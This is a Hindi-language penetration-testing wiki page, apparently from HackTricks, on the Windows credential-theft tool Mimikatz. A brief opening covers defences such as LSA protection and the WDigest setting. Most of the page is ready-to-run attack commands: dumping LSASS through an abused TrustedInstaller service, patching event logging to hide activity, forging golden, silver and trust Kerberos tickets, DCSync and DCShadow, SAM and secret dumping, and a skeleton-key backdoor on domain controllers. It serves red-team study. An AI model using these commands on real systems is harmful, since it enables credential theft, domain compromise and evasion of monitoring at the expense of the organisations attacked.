# Mimikatz {{#include ../../banners/hacktricks-training.md}} **यह पृष्ठ [adsecurity.org](https://adsecurity.org/?page_id=1821) से आधारित है**। आगे की जानकारी के लिए मूल पृष्ठ देखें! ## LM और Clear-Text मेमोरी में Windows 8.1 और Windows Server 2012 R2 से आगे, क्रेडेंशियल चोरी के खिलाफ सुरक्षा के लिए महत्वपूर्ण उपाय लागू किए गए हैं: - **LM हैश और प्लेन-टेक्स्ट पासवर्ड** अब मेमोरी में संग्रहीत नहीं किए जाते हैं ताकि सुरक्षा बढ़ सके। एक विशेष रजिस्ट्री सेटिंग, _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_ को `0` के DWORD मान के साथ कॉन्फ़िगर किया जाना चाहिए ताकि Digest Authentication को निष्क्रिय किया जा सके, यह सुनिश्चित करते हुए कि "clear-text" पासवर्ड LSASS में कैश नहीं किए जाते हैं। - **LSA सुरक्षा** को स्थानीय सुरक्षा प्राधिकरण (LSA) प्रक्रिया को अनधिकृत मेमोरी पढ़ने और कोड इंजेक्शन से बचाने के लिए पेश किया गया है। यह LSASS को एक संरक्षित प्रक्रिया के रूप में चिह्नित करके प्राप्त किया जाता है। LSA सुरक्षा को सक्रिय करने में शामिल हैं: 1. _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_ पर रजिस्ट्री को संशोधित करना और `RunAsPPL` को `dword:00000001` पर सेट करना। 2. एक समूह नीति वस्तु (GPO) को लागू करना जो प्रबंधित उपकरणों में इस रजिस्ट्री परिवर्तन को लागू करती है। इन सुरक्षा उपायों के बावजूद, Mimikatz जैसे उपकरण विशिष्ट ड्राइवरों का उपयोग करके LSA सुरक्षा को बायपास कर सकते हैं, हालांकि ऐसे कार्यों को घटना लॉग में रिकॉर्ड किया जाने की संभावना है। ### SeDebugPrivilege हटाने का प्रतिकार प्रशासकों के पास आमतौर पर SeDebugPrivilege होता है, जो उन्हें कार्यक्रमों को डिबग करने की अनुमति देता है। इस विशेषाधिकार को अनधिकृत मेमोरी डंप को रोकने के लिए प्रतिबंधित किया जा सकता है, जो हमलावरों द्वारा मेमोरी से क्रेडेंशियल निकालने के लिए एक सामान्य तकनीक है। हालाँकि, इस विशेषाधिकार को हटाने के बावजूद, TrustedInstaller खाता अभी भी एक अनुकूलित सेवा कॉन्फ़िगरेशन का उपयोग करके मेमोरी डंप कर सकता है: ```bash sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp" sc start TrustedInstaller ``` यह `lsass.exe` मेमोरी को एक फ़ाइल में डंप करने की अनुमति देता है, जिसे फिर किसी अन्य सिस्टम पर क्रेडेंशियल्स निकालने के लिए विश्लेषित किया जा सकता है: ``` # privilege::debug # sekurlsa::minidump lsass.dmp # sekurlsa::logonpasswords ``` ## Mimikatz विकल्प Mimikatz में इवेंट लॉग छेड़छाड़ में दो मुख्य क्रियाएँ शामिल हैं: इवेंट लॉग को साफ करना और नए इवेंट्स के लॉगिंग को रोकने के लिए इवेंट सेवा को पैच करना। नीचे इन क्रियाओं को करने के लिए कमांड दिए गए हैं: #### इवेंट लॉग को साफ करना - **कमांड**: यह क्रिया इवेंट लॉग को हटाने के लिए है, जिससे दुर्भावनापूर्ण गतिविधियों का पता लगाना कठिन हो जाता है। - Mimikatz अपने मानक दस्तावेज़ में सीधे इवेंट लॉग को साफ करने के लिए कोई सीधा कमांड प्रदान नहीं करता है। हालाँकि, इवेंट लॉग हेरफेर आमतौर पर Mimikatz के बाहर सिस्टम टूल या स्क्रिप्ट का उपयोग करके विशिष्ट लॉग को साफ करने में शामिल होता है (जैसे, PowerShell या Windows Event Viewer का उपयोग करके)। #### प्रयोगात्मक विशेषता: इवेंट सेवा को पैच करना - **कमांड**: `event::drop` - यह प्रयोगात्मक कमांड इवेंट लॉगिंग सेवा के व्यवहार को संशोधित करने के लिए डिज़ाइन किया गया है, प्रभावी रूप से इसे नए इवेंट्स को रिकॉर्ड करने से रोकता है। - उदाहरण: `mimikatz "privilege::debug" "event::drop" exit` - `privilege::debug` कमांड सुनिश्चित करता है कि Mimikatz आवश्यक विशेषाधिकारों के साथ सिस्टम सेवाओं को संशोधित करता है। - फिर `event::drop` कमांड इवेंट लॉगिंग सेवा को पैच करता है। ### Kerberos टिकट हमले ### गोल्डन टिकट निर्माण गोल्डन टिकट डोमेन-व्यापी पहुंच अनुकरण की अनुमति देता है। मुख्य कमांड और पैरामीटर: - कमांड: `kerberos::golden` - पैरामीटर: - `/domain`: डोमेन का नाम। - `/sid`: डोमेन का सुरक्षा पहचानकर्ता (SID)। - `/user`: अनुकरण करने के लिए उपयोगकर्ता नाम। - `/krbtgt`: डोमेन के KDC सेवा खाते का NTLM हैश। - `/ptt`: सीधे मेमोरी में टिकट को इंजेक्ट करता है। - `/ticket`: बाद में उपयोग के लिए टिकट को सहेजता है। उदाहरण: ```bash mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit ``` ### Silver Ticket Creation Silver Tickets विशिष्ट सेवाओं तक पहुँच प्रदान करते हैं। मुख्य कमांड और पैरामीटर: - Command: Golden Ticket के समान लेकिन विशिष्ट सेवाओं को लक्षित करता है। - Parameters: - `/service`: लक्षित सेवा (जैसे, cifs, http)। - अन्य पैरामीटर Golden Ticket के समान हैं। Example: ```bash mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit ``` ### Trust Ticket Creation Trust Tickets का उपयोग डोमेन के बीच संसाधनों तक पहुँचने के लिए विश्वास संबंधों का लाभ उठाने के लिए किया जाता है। मुख्य कमांड और पैरामीटर: - Command: Golden Ticket के समान लेकिन विश्वास संबंधों के लिए। - Parameters: - `/target`: लक्षित डोमेन का FQDN। - `/rc4`: ट्रस्ट खाते के लिए NTLM हैश। Example: ```bash mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit ``` ### अतिरिक्त Kerberos कमांड - **टिकट सूचीबद्ध करना**: - कमांड: `kerberos::list` - वर्तमान उपयोगकर्ता सत्र के लिए सभी Kerberos टिकटों की सूची बनाता है। - **कैश पास करें**: - कमांड: `kerberos::ptc` - कैश फ़ाइलों से Kerberos टिकटों को इंजेक्ट करता है। - उदाहरण: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit` - **टिकट पास करें**: - कमांड: `kerberos::ptt` - किसी अन्य सत्र में Kerberos टिकट का उपयोग करने की अनुमति देता है। - उदाहरण: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit` - **टिकट हटाएं**: - कमांड: `kerberos::purge` - सत्र से सभी Kerberos टिकटों को साफ करता है। - टिकट हेरफेर कमांड का उपयोग करने से पहले संघर्षों से बचने के लिए उपयोगी। ### सक्रिय निर्देशिका छेड़छाड़ - **DCShadow**: AD ऑब्जेक्ट हेरफेर के लिए एक मशीन को अस्थायी रूप से DC के रूप में कार्य करने के लिए बनाएं। - `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit` - **DCSync**: पासवर्ड डेटा का अनुरोध करने के लिए एक DC की नकल करें। - `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit` ### क्रेडेंशियल एक्सेस - **LSADUMP::LSA**: LSA से क्रेडेंशियल निकालें। - `mimikatz "lsadump::lsa /inject" exit` - **LSADUMP::NetSync**: एक कंप्यूटर खाते के पासवर्ड डेटा का उपयोग करके एक DC की नकल करें। - _NetSync के लिए मूल संदर्भ में कोई विशिष्ट कमांड प्रदान नहीं की गई है।_ - **LSADUMP::SAM**: स्थानीय SAM डेटाबेस तक पहुंचें। - `mimikatz "lsadump::sam" exit` - **LSADUMP::Secrets**: रजिस्ट्री में संग्रहीत रहस्यों को डिक्रिप्ट करें। - `mimikatz "lsadump::secrets" exit` - **LSADUMP::SetNTLM**: एक उपयोगकर्ता के लिए एक नया NTLM हैश सेट करें। - `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit` - **LSADUMP::Trust**: ट्रस्ट प्रमाणीकरण जानकारी प्राप्त करें। - `mimikatz "lsadump::trust" exit` ### विविध - **MISC::Skeleton**: DC पर LSASS में एक बैकडोर इंजेक्ट करें। - `mimikatz "privilege::debug" "misc::skeleton" exit` ### विशेषाधिकार वृद्धि - **PRIVILEGE::Backup**: बैकअप अधिकार प्राप्त करें। - `mimikatz "privilege::backup" exit` - **PRIVILEGE::Debug**: डिबग विशेषाधिकार प्राप्त करें। - `mimikatz "privilege::debug" exit` ### क्रेडेंशियल डंपिंग - **SEKURLSA::LogonPasswords**: लॉग इन किए गए उपयोगकर्ताओं के लिए क्रेडेंशियल दिखाएं। - `mimikatz "sekurlsa::logonpasswords" exit` - **SEKURLSA::Tickets**: मेमोरी से Kerberos टिकट निकालें। - `mimikatz "sekurlsa::tickets /export" exit` ### सिड और टोकन हेरफेर - **SID::add/modify**: SID और SIDHistory बदलें। - जोड़ें: `mimikatz "sid::add /user:targetUser /sid:newSid" exit` - संशोधित करें: _मूल संदर्भ में संशोधन के लिए कोई विशिष्ट कमांड नहीं है।_ - **TOKEN::Elevate**: टोकनों की नकल करें। - `mimikatz "token::elevate /domainadmin" exit` ### टर्मिनल सेवाएँ - **TS::MultiRDP**: कई RDP सत्रों की अनुमति दें। - `mimikatz "ts::multirdp" exit` - **TS::Sessions**: TS/RDP सत्रों की सूची बनाएं। - _मूल संदर्भ में TS::Sessions के लिए कोई विशिष्ट कमांड प्रदान नहीं की गई है।_ ### वॉल्ट - Windows Vault से पासवर्ड निकालें। - `mimikatz "vault::cred /patch" exit` {{#include ../../banners/hacktricks-training.md}}